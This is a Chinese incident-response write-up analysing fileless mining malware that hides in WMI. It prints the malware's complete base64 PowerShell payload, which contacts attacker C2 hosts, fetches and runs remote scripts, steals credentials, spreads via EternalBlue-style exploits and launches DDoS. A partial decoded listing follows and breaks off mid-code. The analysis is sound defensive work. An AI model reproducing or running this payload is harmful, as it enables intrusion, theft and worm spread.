无文件挖矿应急响应处置报告
发布日期:2021-07-29 03:38:02 浏览次数:80 分类:技术文章

本文共 24156 字,大约阅读时间需要 80 分钟。

1.1 情况拓扑

由于运维过程中可能存在违规操作、过失操作或者防护能力不足导致被恶意操作使得主机遭受挖矿程序的侵害,该挖矿程序会下载恶意程序至WMI中,实现无文件挖矿和内网渗透,并下载DDOS攻击程序和通过任务计划每隔20分钟自动生成版本校验恶意程序。

1.2 情况简介

2019年4月4日收到用户告警,内网主机存在CPU过高现象,同时网络异常监测预警平台告警内网主机有主动连接矿池行为。

1.3 分析思路

挖矿程序如要体现出长久稳定的产出货币价值,其基础功能实现、长期运行、自我隐藏和自我传播的基本特性必不可少。遂根据恶意人员的攻击基本意图进行分析:

1.检查挖矿运行过程;

2.检查其自我传播的方式方法;

3.检查其如何长期运行;

4.检查其如何渗透至操作系统中;

尝试通过分析以上过程,从而闭环各个恶意环节的攻击流程。

二、主机挖矿行为分析处置

2.1 现状描述

该主机CPU使用率75%:Powershell.exe占用CPU较高,对其进行检查。

2.2 父子进程对应表

wmic process得到的相关进程名、父进程、子进程经梳理后对应表如下所示:

Caption ParentProcessId ProcessId
wininit.exe 348 388
services.exe 388 504
svchost.exe 504 624
WmiPrvSE.exe 624 5148
powershell.exe 5148 3964
powershell.exe 3964 3180

各程序CommandLine详见后续。

2.3 wininit.exe

CommandLine:wininit.exe

Windows启动应用程序。用于启动services.exe(服务控制管理器)、lsass.exe(本地安全授权)、lsm.exe(本地会话管理器)。

2.4 services.exe

CommandLine:C:\Windows\system32\services.exe

Windows服务管理应用程序。

2.5 svchost.exe

CommandLine:C:\Windows\system32\svchost.exe-k DcomLaunch 

DCOMLAUNCH服务可启动COM和DCOM服务器,以响应对象激活请求。

2.6 WmiPrvSE.exe

CommandLine:C:\Windows\system32\wbem\wmiprvse.exe

wmiprvse.exe是微软Windows操作系统的一部分,用于通过WinMgmt.exe程序处理WMI操作。

2.7 powershell.exe(PID 3964)

 

CommandLine:powershell.exe-NoP -NonI -W Hidden -E

 

JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQAxADEALgA5ADAALgAxADQANQAuADUAMgAnACkALAAoACcAMQA4ADUALgAyADMANAAuADIAMQA3AC4AMQAzADkAJwApACkADQAKACQAYQB2AGcAcwAgAD0AIABAACgAKQANAAoAJABuAGkAYwAgAD0AIAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwANAAoAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAzADsAJABpACsAKwApAHsADQAKAAkAJABzAHUAbQAgAD0AIAAwAA0ACgAJACQAYwBvAHUAbgB0ACAAPQAgADAADQAKAAkAZgBvAHIAKAAkAGoAPQAxADsAJABqACAALQBsAGUAIAA0ADsAJABqACsAKwApAHsADQAKAAkACQAkAHQAbQBwACAAPQAgACgAJABwAGkAbgAuAHMAZQBuAGQAKAAkAHMAZQBbACQAaQBdACkAKQAuAFIAbwB1AG4AZAB0AHIAaQBwAFQAaQBtAGUADQAKAAkACQBpAGYAIAAoACQAdABtAHAAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAJACQAYwBvAHUAbgB0ACAAKwA9ACAAMQANAAoACQAJAH0ADQAKAAkACQAkAHMAdQBtACAAKwA9ACAAJAB0AG0AcAANAAoACQB9AA0ACgAJAGkAZgAgACgAJABjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQAkAGEAdgBnAHMAIAArAD0AIAAkAHMAdQBtAC8AJABjAG8AdQBuAHQADQAKAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJACQAYQB2AGcAcwAgACsAPQAgADAADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMAApAHsADQAKAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAzADAAMAApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMABdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADEAKQB7AA0ACgAJAAkAaQBmACAAKAAkAGEAdgBnAHMAWwAxAF0AIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMABdACAALQBsAGUAIAAkAGEAdgBnAHMAWwAxAF0AKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADAAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMABdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADEAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADIAKQB7AA0ACgAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAMwAwADAAKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkAfQANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAzACkAewANAAoACQAJAGkAZgAgACgAJABhAHYAZwBzAFsAMwBdACAALQBuAGUAIAAwACkAewANAAoACQAJAAkAaQBmACAAKAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbABlACAAJABhAHYAZwBzAFsAMwBdACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAyAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADIAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0AZQBsAHMAZQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAzAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACgAJwA6ACcAKwAnADQANAAzACcAKQANAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdgBlAHIALgB0AHgAdAAiACkALgBUAHIAaQBtACgAKQANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewANAAoAIAAgACAAIAAkAHYAZQByAF8AdABtAHAAPQAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwB2AGUAcgAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJAB2AGUAcgBfAHQAbQBwACkAewANAAoAIAAgACAAIAAgACAAIAAgAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvACQAbgBpAGMALwBhAG4AdABpAHYAaQByAHUAcwAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKACQAcwB0AGkAbQBlAD0AWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQADQAKACQAZgB1AG4AcwAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQANAAoAJABkAGUAZgB1AG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAdQBuAHMAKQApAA0ACgBpAGUAeAAgACQAZABlAGYAdQBuAA0ACgANAAoARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAF8AXwBGAGkAbAB0AGUAcgBUAG8AQwBvAG4AcwB1AG0AZQByAEIAaQBuAGQAaQBuAGcAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBmAGkAbAB0AGUAcgAgAC0AbgBvAHQAbQBhAHQAYwBoACAAJwBXAGkAbgBkAG8AdwBzACAARQB2AGUAbgB0AHMAJwB9ACAAfABSAGUAbQBvAHYAZQAtAFcAbQBpAE8AYgBqAGUAYwB0AA0ACgANAAoADQAKAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAPQAgAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAB8AHMAbwByAHQAIABjAHAAdQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBpAGQAfQANAAoAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoAJABlAHgAaQBzAHQAPQAkAEYAYQBsAHMAZQANAAoAaQBmACAAKAAkAHAAcwBpAGQAcwAgAC0AbgBlACAAJABuAHUAbABsACAAKQANAAoAewANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAcABzAGkAZABzACAALQBjAG8AbgB0AGEAaQBuAHMAIAAkAGwAaQBuAGUAWwAtADEAXQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADAAIAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAxADQANAA0ADQAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAFIAdQBuAEQARABPAFMAIAAiAGMAbwBoAGUAcgBuAGUAYwBlAC4AZQB4AGUAIgANAAoASwBpAGwAbABCAG8AdAAoACcAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADUANQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADcANwA3ADcAIgApACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7AA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AbwBuACcAXQAuAFYAYQBsAHUAZQA7AGAAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlACAAOwBpAGUAeAAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAYAAkAGYAdQBuAHMAKQApACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAgAC0AUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAAYAAkAFIAZQBtAG8AdABlAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABAACgAYAAkAG0AbwBuACwAIABgACQAbQBvAG4ALAAgACcAVgBvAGkAZAAnACwAIAAwACwAIAAnACcALAAgACcAJwApAGAAIgAiAA0ACgAgACAAIAAgACQAdgBiAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBvAG0ATwBiAGoAZQBjAHQAIABXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAA0ACgAgACAAIAAgACQAdgBiAHMALgByAHUAbgAoACQAYwBtAGQAbQBvAG4ALAAwACkADQAKAH0ADQAKAA0ACgAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAJABtAGkAbQBpACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG0AaQBtAGkAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKAGkAZgAgACgAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0ALgBsAGUAbgBnAHQAaAAgAC0AbgBlACAAMwAyACkADQAKAHsADQAKACAAIAAgACAAKAAkAGEAIAAtAFMAcABsAGkAdAAgACIAIAAiACkAWwAyAF0AIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBFAG4AYwBvAGQAaQBuAGcAIABhAHMAYwBpAGkAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYQAyADUAaABZADIAdABsAGMAbQBWAGsALgB0AHgAdAAiAA0ACgB9AA0ACgANAAoAJABOAGUAdAB3AG8AcgBrAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABOAFMAXQA6ADoARwBlAHQASABvAHMAdABCAHkATgBhAG0AZQAoACQAbgB1AGwAbAApAC4AQQBkAGQAcgBlAHMAcwBMAGkAcwB0AA0ACgAkAGkAcABzAHUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQBwAHMAdQAnAF0ALgBWAGEAbAB1AGUADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAaQAxADcAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHMAYwAnAF0ALgBWAGEAbAB1AGUADQAKAFsAYgB5AHQAZQBbAF0AXQAkAHMAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHMAYwBiAGEAKQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJABOAGUAdAB3AG8AcgBrACAAaQBuACAAJABOAGUAdAB3AG8AcgBrAHMAKQANAAoAewANAAoADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAUABBAGQAZAByAGUAcwBzAFQAbwBTAHQAcgBpAG4AZwANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACQAUwB1AGIAbgBlAHQATQBhAHMAawAgACAAPQAgACcAMgA1ADUALgAyADUANQAuADIANQA1AC4AMAAnAA0ACgAgACAAIAAgACQAaQBwAHMAXwBjAD0ARwBlAHQALQBuAGUAdAB3AG8AcgBrAHIAYQBuAGcAZQAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsADQAKACAAIAAgACAAJABpAHAAcwBfAGIAPQBHAGUAdAAtAEkAcABJAG4AQgAgACQASQBQAEEAZABkAHIAZQBzAHMADQAKACAAIAAgACAAJABpAHAAcwA9ACQAaQBwAHMAXwBjACsAJABpAHAAcwBfAGIADQAKAAkAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoACQBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQBpAGYAIAAoACQAbABpAG4AZQAuAGMAbwB1AG4AdAAgAC0AbABlACAANAApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKAAkACQAkAGkAPQAkAGwAaQBuAGUAWwAtADMAXQAuAHMAcABsAGkAdAAoACcAOgAnACkAWwAwAF0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACAAKAAkAGwAaQBuAGUAWwAtADIAXQAgAC0AZQBxACAAJwBFAFMAVABBAEIATABJAFMASABFAEQAJwApACAALQBhAG4AZAAgACAAKAAkAGkAIAAtAG4AZQAgACcAMQAyADcALgAwAC4AMAAuADEAJwApACAALQBhAG4AZAAgACgAJABpAHAAcwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBwAHMAKwA9ACQAaQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJABpAHAAIABpAG4AIAAkAGkAcABzACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAAtACQAcwB0AGkAbQBlACkALwAxADAAMAAwACAALQBnAHQAIAA1ADQAMAAwACkAewBiAHIAZQBhAGsAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABpAHAAIAAtAGUAcQAgACQASQBQAEEAZABkAHIAZQBzAHMAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkACQAJAGkAZgAgACgAKABUAGUAcwB0AC0AUABvAHIAdAAgACQAaQBwACkAIAAtAG4AZQAgACQAZgBhAGwAcwBlACAALQBhAG4AZAAgACQAaQBwAHMAdQAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQANAAoACQAJAAkACQBpAGYAIAAoACQAdgB1AGwAIAAtAGEAbgBkACAAJABpADEANwAgAC0AbgBvAHQAYwBvAG4AdABhAGkAbgBzACAAJABpAHAAKQANAAoADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAcgBlAHMAPQBlAGIANwAgACQAaQBwACAAJABzAGMADQAKAAkACQAJAAkACQBpAGYAIAAoACEAKAAkAHIAZQBzACAALQBlAHEAIAAkAHQAcgB1AGUAKQApAA0ACgAJAAkACQAJAAkAewBlAGIAOAAgACQAaQBwACAAJABzAGMAfQANAAoACQAJAAkACQAJACQAaQAxADcAIAA9ACAAJABpADEANwAgACsAIAAiACAAIgArACQAaQBwAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAfQANAAoADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==

 

powershell.exe是一种命令行外壳程序和脚本环境。参数简介如下所示:

序号 参数 简介
1 -NoP 不加载Windows PowerShell配置文件
2 -NonI 命令行运行后不和用户进行交互
3 -W Hidden 将命令行运行窗口隐藏
4 -E 接受base-64编码字符串版本的命令

个人不会代码,所以对上述base64字符串进行解码并添加代码块简意是连蒙带猜的,主要表达其中有部分内容将下一步工作指向WMI,如上所述在应急过程中进行是最好的,我当时是根据关键字查找大牛已经写过的材料进行下一步工作:

 

 

 

$pin = new-object system.net.networkinformation.ping

 

$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('111.90.145.52'),('185.234.217.139'))

 

$avgs = @()

 

$nic = 'update.7h4uk.com'

 

for($i=0;$i -le 3;$i++){

 

    $sum = 0

 

    $count = 0

 

//判断服务端是否在线和延时情况以连接对应的域名或IP

 

    for($j=1;$j -le 4;$j++){

 

        $tmp =($pin.send($se[$i])).RoundtripTime

 

        if ($tmp -ne 0){

 

                $count += 1

 

        }

 

        $sum += $tmp

 

    }

 

    if ($count -ne 0){

 

            $avgs += $sum/$count

 

    }else{

 

            $avgs += 0

 

    }

 

    if ($i -eq 0){

 

